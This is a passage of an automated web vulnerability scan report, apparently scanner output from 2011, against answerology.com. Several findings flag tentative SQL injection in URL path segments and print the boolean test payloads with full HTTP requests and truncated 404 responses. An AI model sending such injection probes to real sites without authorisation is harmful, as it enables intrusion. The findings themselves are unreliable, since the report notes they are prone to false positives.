Path:   /cobrands/seventeen/SeventeenLayout.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21121690'%20or%201%3d1--%20 and 21121690'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands21121690'%20or%201%3d1--%20/seventeen/SeventeenLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands21121690'%20or%201%3d2--%20/seventeen/SeventeenLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:50 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...
1.32. http://www.answerology.com/cssjs/CharacterCounter.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cssjs/CharacterCounter.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cssjs'%20and%201%3d1--%20/CharacterCounter.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:32 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cssjs'%20and%201%3d2--%20/CharacterCounter.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:33 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...
1.33. http://www.answerology.com/cssjs/CoachesLayout.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cssjs/CoachesLayout.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 18708381'%20or%201%3d1--%20 and 18708381'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cssjs/CoachesLayout.js18708381'%20or%201%3d1--%20?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:43:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cssjs/CoachesLayout.js18708381'%20or%201%3d2--%20?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:43:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...
1.34. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cssjs/countdownTimer.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cssjs'%20and%201%3d1--%20/countdownTimer.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:40 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cssjs'%20and%201%3d2--%20/countdownTimer.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:40 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...
1.35. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cssjs/countdownTimer.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 23080796'%20or%201%3d1--%20 and 23080796'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cssjs/countdownTimer.js23080796'%20or%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:43 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
